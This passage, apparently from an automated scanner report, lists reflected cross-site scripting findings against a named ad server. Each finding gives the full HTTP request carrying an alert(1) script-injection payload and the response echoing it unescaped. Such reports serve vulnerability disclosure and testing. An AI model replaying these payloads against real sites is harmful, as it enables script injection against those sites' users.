This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ad9b5"-alert(1)-"ae5167346a4/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 20:51:37 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011Pk0inO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1968
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 20:52:37 GMT;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
r_d.getMinutes()+"|"+-pr_d.getTimezoneOffset()/60;
var pr_postal="";
var pr_data="";
var pr_redir="http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ad9b5"-alert(1)-"ae5167346a4/a/L7/1602226044/x10/USNetwork/BCN2010090393_019_HRBlock/hrblock_cc_160.html/726348573830307044726341416f7670?$CTURL$";
var pr_pos="";
var prHost=(("https:"==document.location.protocol)?"https://":"h
...[SNIP]...

1.54. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e41"><script>alert(1)</script>fd9b0b18fed was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x1071e41"><script>alert(1)</script>fd9b0b18fed HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:37 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIr; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:37 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a/1844700153/x1071e41"><script>alert(1)</script>fd9b0b18fed/default/empty.gif/726348573830307044726341416f7670?" target="_top">
...[SNIP]...

1.55. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4229b"><script>alert(1)</script>e77cb2f0e34 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews4229b"><script>alert(1)</script>e77cb2f0e34/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:00 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIG; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 373
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:00 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews4229b"><script>alert(1)</script>e77cb2f0e34/runofnetwork/300x250/autnwsrlsttch/ss/a/1191253499/x15/default/empty.gif/726348573830307044726341416f7670?" target="_top">
...[SNIP]...

1.56. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88d7c"><script>alert(1)</script>627af51db03 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork88d7c"><script>alert(1)</script>627af51db03/300x250/autnwsrlsttch/ss/a@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:02 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIIO3016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 520
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0d45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:02 GMT;path=/

<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/300_B3AdTag --->
<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/300/11196345589@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork88d7c"><script>alert(1)</script>627af51db03/300x250/autnwsrlsttch/ss/a/L7/1196345589/x15/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_300.html/726348573830307044726341416f7670?">
...[SNIP]...

1.57. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8098"><script>alert(1)</script>84786c535a5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250c8098"><script>alert(1)</script>84786c535a5/autnwsrlsttch/ss/a@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIKO10167S|O3016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 520
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:04 GMT;path=/

<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/300_B3AdTag --->
<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/300/11544219975@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/300x250c8098"><script>alert(1)</script>84786c535a5/autnwsrlsttch/ss/a/L7/1544219975/x15/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_300.html/726348573830307044726341416f7670?">
...[SNIP]...

1.58. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c098"><script>alert(1)</script>a29bb87f7c3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch5c098"><script>alert(1)</script>a29bb87f7c3/ss/a@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:06 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIMO1016Kj; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 520
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:06 GMT;path=/

<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/300_B3AdTag --->
<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/300/11590386625@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch5c098"><script>alert(1)</script>a29bb87f7c3/ss/a/L7/1590386625/x15/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_300.html/726348573830307044726341416f7670?">
...[SNIP]...

1.59. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42efc"><script>alert(1)</script>916717c49c8 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss42efc"><script>alert(1)</script>916717c49c8/a@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:08 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIOO5016Kj; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 520
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:09 GMT;path=/

<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/300_B3AdTag --->
<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/300/11842730930@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss42efc"><script>alert(1)</script>916717c49c8/a/L7/1842730930/x15/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_300.html/726348573830307044726341416f7670?">
...[SNIP]...

1.60. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9609f"><script>alert(1)</script>48098e26502 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x159609f"><script>alert(1)</script>48098e26502 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:11 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIR; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:11 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a/340360854/x159609f"><script>alert(1)</script>48098e26502/default/empty.gif/726348573830307044726341416f7670?" target="_top">
...[SNIP]...

1.61. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c808"><script>alert(1)</script>ba65244ab6a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews9c808"><script>alert(1)</script>ba65244ab6a/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:00 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIG; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 372
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:00 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews9c808"><script>alert(1)</script>ba65244ab6a/runofnetwork/728x90/autnwsrlsttch/ss/a/168652954/Top1/default/empty.gif/726348573830307044726341416f7670?" target="_top">
...[SNIP]...

1.62. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload febad"><script>alert(1)</script>82ddd457fa8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetworkfebad"><script>alert(1)</script>82ddd457fa8/728x90/autnwsrlsttch/ss/a@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:02 GMT
